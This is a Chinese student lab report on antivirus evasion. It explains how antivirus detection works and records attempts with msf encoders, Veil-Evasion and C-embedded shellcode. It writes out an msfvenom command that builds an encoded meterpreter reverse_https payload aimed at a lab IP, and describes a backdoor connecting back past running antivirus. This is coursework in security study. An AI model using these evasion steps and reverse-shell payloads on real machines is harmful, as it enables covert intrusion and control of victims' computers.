20155227《网络对抗》Exp3 免杀原理与实践

实践内容

正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧
通过组合应用各种技术实现恶意代码免杀
用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

基础问题回答

杀软是如何检测出恶意代码的？

基于特征码的检测：可执行文件包含特征码库中的某段数据就会被认为是恶意代码。
启发式恶意软件检测：一个软件在干通常是恶意软件干的事，看起来了像个恶意软件，就把它当成一个恶意软件。
基于行为的恶意软件检测：启发式的一种，加入了行为监控。

免杀是做什么？

想尽一切办法不让杀软发现自己是个病毒，然后悄悄地做病毒要做的事情。

免杀的基本方法有哪些？

改变特征码：对于exe可以加壳，对于shellcode可以用encode编码、基于payload重编译，对于源代码可以用其他语言重写。
改变行为：在通信方式方面尽量使用反弹式连接、隧道技术、加密数据，在操作模式上尽量基于内存操作、减少修改系统、加入有正常作用的代码迷惑杀软。

实验内容及步骤

MSF编码器

1.直接使用上一个实验生成的后门程序检测结果如下：

2.一次编码结果：

3.十次编码结果：

编码次数再多，也没什么实质性的变化。

Veil-Evasion

首先安装veil：

use python/meterpreter/rev_tcp.py（设置payload）
set LHOST Kali的IP（设置反弹连接IP）
set port 端口号（设置反弹端口，默认为4444）
generate
可执行文件名
1（选择使用python语言来编写）

可是这个时候出现了错误，我又重来了一次，最后一步选择2(pyexe2),可是这个时候并没有生成exe文件。

后来我不使用python，使用c语言。

扫描结果如下：

同样也被360检查出来了。

C语言调用Shellcode

首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。

然后，在Win主机上使用VC新建一个c文件，将Shellcode数组拷贝到其中，在加上头文件和一个小函数。

扫描结果如下：

12%的杀软报告病毒。

运用压缩壳＋上面的C+shellcode：

依然是12%的杀软报告病毒。

结合使用不同编码器：msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=192.168.115.128 -f c命令生成的shellcode数组拷贝到c文件中扫描结果如下（使用默认的编译选项就可以完成免杀。）：

依然有15%的杀软报告病毒。

360直接检查出来了。

免杀回连测试

在使用veil-evasion测试时，最后一步选择2(pyexe2),可是这个时候并没有生成exe文件。

于是我在win下用python setup.py py2exe命令进行编译python源代码5227test32.py，在生成的dist目录下有生成的exe文件（在win下安装了Python2.7和py2exe）。
脚本setup.py如下：

进行扫描结果如下：

按照上次实验用过的msf监听方法在Kali上打开监听，在Win（win7）主机开启杀软（腾讯管家）的情况下，Kali成功获取了Win主机的权限：

离实战还缺些什么技术或步骤？

在实际应用中，我们不可能这么容易将后门植入到别人的电脑，或许可以通过钓鱼网站之类的方法来实现。而且按照我这次实现免杀的方法，是在win下面进行编译，实际运用中也不知道该如何实现。这点还需要我们去思考，去探索。而且现在各种杀毒软件层出不穷，它们的病毒库在不断地更新，功能也在不断地完善，今天实现了免杀可能过段时间就失败了，所以还需要我们根据漏洞自己写代码，而不是用软件来直接生成。

实践总结与体会

做完这次实验，我对于网络安全的问题有了更深的体会。之前一直觉得只要安装好杀毒软件，定期杀毒、给电脑体检就可以了，然而我们自己都能实现免杀，更不要说那些恶意想要攻击你电脑的人了。在当今社会，处处离不开网络，因此我们要时时刻刻提高安全防范意识，定期检查自己的电脑，防止别人恶意盗取利用自己的信息。希望可以将自己学到的知识与实践相结合，帮助别人解决更多的问题。